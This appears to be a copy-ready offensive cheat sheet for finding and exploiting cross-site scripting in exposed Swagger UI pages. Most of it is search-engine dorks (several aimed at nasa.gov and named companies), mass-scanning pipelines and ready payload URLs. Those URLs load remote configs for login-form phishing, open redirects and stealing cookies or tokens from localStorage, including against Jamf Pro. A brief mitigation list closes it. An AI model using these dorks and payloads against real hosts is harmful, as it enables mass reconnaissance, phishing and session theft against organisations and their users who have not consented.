Swagger XSS Vulnerabilities
Exploiting Cross-Site Scripting in Swagger UI and OpenAPI documentation interfaces. Complete guide with dorks, automation, and bypass techniques.
12 Categories40+ CommandsCopy Ready
Phase 1
Google Dorks - Find Exposed APIs
1#1 Find non-root subdomains of swagger.io with exposed Swagger UI
site:*.swagger.io -www2#2 Find Swagger UI on a specific target domain
intext:"Swagger UI" intitle:"Swagger UI" site:Target.com3#3 Search for Swagger endpoints on NASA's domain
site:nasa.gov inurl:(swagger-ui OR swagger.json OR swagger.yaml)4#4 Locate default Swagger UI paths
inurl:"/swagger-ui/index.html"5#5 Advanced: Multiple paths on NASA, filtering dev platforms
intitle:"Swagger UI" (inurl:"/swagger-ui/" OR inurl:"/swagger/" OR inurl:"/api-docs/" OR inurl:"/v2/api-docs" OR inurl:"/v3/api-docs" OR inurl:"swagger.json" OR inurl:"swagger.yaml") -github -gitlab -stackoverflow site:nasa.gov6#6 Find exposed API spec files in common API folders on NASA
site:nasa.gov (inurl:api OR inurl:apis OR inurl:graphql OR inurl:swagger OR inurl:v1 OR inurl:v2 OR inurl:v3) (filetype:json OR filetype:yaml OR filetype:xml)Phase 2
Automating Google Dork Results
1Extract unique domains from swagger.txt using awk
cat swagger.txt | awk -F/ '{print $3}' | sort -u2Pipe discovered domains to Nuclei for Swagger scanning
cat swagger.txt | awk -F/ '{print $3}' | sort -u | nuclei -t swagger.yaml3Use Python script for automated dorking (reference: https://sites.google.com/site/linkgopher)
python dorking.pyPhase 3
GitHub Dorks - Find Vulnerable Versions
1#1 Find outdated Swagger UI versions 3.1-3.3 in GitHub repos
"/swagger-ui-dist\": \"3.[1-3]/\"" path:*/package.json2#2 Search GitHub repo for hardcoded URLs/endpoints (e.g., repo:strapi/strapi)
repo:ORG/REPO ("https://" OR "http://" OR ".com")Phase 4
Censys - Find Public Swagger UIs
1#1 Censys: Find Swagger keywords in HTTP response bodies using host field
host.services.endpoints.http.body:{"swagger", "swagger-ui"}2#2 Censys: Alternative search using web.endpoints.http.body field
web.endpoints.http.body:{"swagger", "swagger-ui"}3#3 Censys: Search for Swagger on NASA infrastructure
nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}4#4 Censys: Find Swagger UIs on NASA-tagged IPs with response analysis
(nasa AND host.services.endpoints.http.body:{"swagger", "swagger-ui"} OR web.endpoints.http.body:{"swagger", "swagger-ui"}) AND host.ip:*Phase 5
Fofa - Find Swagger Interfaces
1Fofa: Find Swagger UIs using icon hash detection on redacted.com
"redacted.com" && (icon_hash="-1180440057" || icon_hash="-1128940573" || icon_hash="-1839822816" || icon_hash="1120729672")Phase 6
Shodan - Exposed Swagger Interfaces
1#1 Shodan: Detect services with Swagger identified in components
http.component:"Swagger"2#2 Shodan: Search for pages titled Swagger UI
http.title:"Swagger UI"3#3 Shodan: Find pages containing swagger-ui in HTML body
http.html:"swagger-ui"4#4 Shodan: Combined filter for highly accurate Swagger UI detection
http.component:"Swagger" http.title:"Swagger UI" http.html:"swagger-ui"5#5 Shodan: Look for Swagger UI returning 200 OK
http.title:"Swagger UI" +2006#6 Shodan: Find Swagger UIs on a specific domain (e.g., getsling.com)
http.title:"Swagger UI" hostname:"getsling.com"Phase 7
Mass Hunting - Shodan Facet Analysis
1#1 Extract IPs from Shodan search results and export to text file
var ipElements=document.querySelectorAll('strong');var ips=[];ipElements.forEach(function(e){ips.push(e.innerHTML.replace(/["']/g,''))});var ipsString=ips.join('\n');var a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(ipsString);a.download='ip.txt';document.body.appendChild(a);a.click();2#2 Extract both IPs and Domains from Shodan and export to file
var ipElements=document.querySelectorAll('strong'),ips=[],domains=[];ipElements.forEach(function(e){var t=e.innerHTML.replace(/["']/g,'').trim();/^(\d{1,3}\.){3}\d{1,3}$/.test(t)?ips.push(t):/^(?!\d+\.)[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(t)&&domains.push(t)});var dataString='IPs:\n'+ips.join('\n')+'\n\nDomains:\n'+domains.join('\n'),a=document.createElement('a');a.href='data:text/plain;charset=utf-8,'+encodeURIComponent(dataString);a.download='domains.txt';document.body.appendChild(a);a.click();3Scan extracted IPs with Nuclei Swagger template
cat ip.txt | sort -u | nuclei -t swagger.yaml4Scan extracted domains with Nuclei Swagger template
cat domains.txt | sort -u | nuclei -t swagger.yamlPhase 8
Automation with Subfinder and Httpx
1#1 Find Swagger UI on all subdomains of a target
subfinder -d target.com -all | httpx-toolkit -silent -title | grep "Swagger UI"2#2 Detect Swagger, OpenAPI, Redoc, or RapiDoc on a list of domains
cat swagger.txt | httpx-toolkit -silent -title | grep -Ei "swagger|openapi|redoc|rapidoc"3#3 Probe common Swagger documentation paths on a single domain
echo "example.com" | httpx -path /docs,/swagger,/api-docs,/swagger-ui,/swagger-ui.htmlPhase 9
Path Brute-Forcing with Custom Wordlists
1Fuzz for Swagger paths using custom wordlist and alive domains
ffuf -w /root/wordlist/api/swagger_xss.txt:FUZZ -w alive_ones.txt:URL -u URLFUZZ -mc 200 -o ffuf-result.txt2Dirsearch with multiple extensions for Swagger files
dirsearch -u https://api.getsling.com -w payloads/swagger.txt -e html,json,yaml,js -t 20 --random-agent --force-recursive --full-url3Reference: Swagger wordlist by CoffinXP
https://github.com/coffinxp/swagger/blob/main/swagger-wordlist.txtPhase 10
DOM XSS via Swagger UI - Jamf Pro
1Jamf Pro: Load custom Swagger login form template for phishing
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9zdGFuZGluZy5zaGlyb3VwL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvc3dhZ2dlciJ92Jamf Pro: Test open redirect behavior via redirecting login config
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMvcmVkdXJpLnB4N3UifQ==3Jamf Pro: Trigger basic XSS payload to check for DOM-based vulnerabilities
https://VULNERABLE_JAMF/classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHViVXNlcmNvbnRlbnQuY29tL3Byb2plY3RzL3dlYmhhY2tpbmdfcGxheW5kL2hlbHBlcnMveHNzdGVzdC5qc29uIn0=4If vulnerable: extract auth token from localStorage
alert(localStorage.getItem('authToken'))Phase 11
DOM XSS & HTML Injection & Open Redirect
1#1 Loads a custom Swagger login form template for login phishing
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.json2#2 Tests open redirect behavior via a redirecting login config
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.json3#3 Triggers a basic XSS payload to check for DOM-based vulnerabilities
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.json4#4 Executes a script to exfiltrate cookies or auth tokens from localStorage
https://site.com/?configUrl=https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.jsonPhase 12
Mitigation - How Developers Can Prevent
1Avoid exposing Swagger documentation on live or customer-facing systems
# Disable Swagger UI in production environments2Protect Swagger routes with Basic Auth, token-based auth, or IP whitelisting
# Require authentication for accessing Swagger UI3Use a strict whitelist of allowed domains or remove support for remote schema loading
# Validate and sanitize query parameters like ?url=4Stay updated with newest releases to patch known vulnerabilities
# Use the latest stable version of Swagger UI5Sanitize any dynamic data rendered within Swagger UI templates
# Apply consistent input validation and escapingReference
Version-Specific Vulnerabilities
Swagger UI 2.x
Vulnerabilities
- configUrl parameter injection
- Reflected XSS via query parameters
- OpenAPI spec injection in info fields
- Unsanitized parameter names/descriptions
Swagger UI 3.x (modern)
Vulnerabilities
- URL parameter injection (url, configUrl)
- DOM XSS via client-side rendering
- OpenAPI spec injection
- Template injection in some implementations
Swagger UI 4.x+ (latest)
Vulnerabilities
- Reduced attack surface with CSP
- Some XSS via custom plugins
- Misconfigured OAuth/OIDC flows
- Reflected XSS if CSP bypassed
Tools
Tools & Resources
Link Gopher Browser Extension
Bulk open Swagger UIs and manually test each interface for vulnerabilities
CoffinXP Swagger Repository
Complete Swagger XSS testing repository with payloads and configs
Swagger Wordlist
Custom wordlist for fuzzing Swagger endpoints
Video: Complete Practical Guide
YouTube video showing complete practical implementation of Swagger XSS method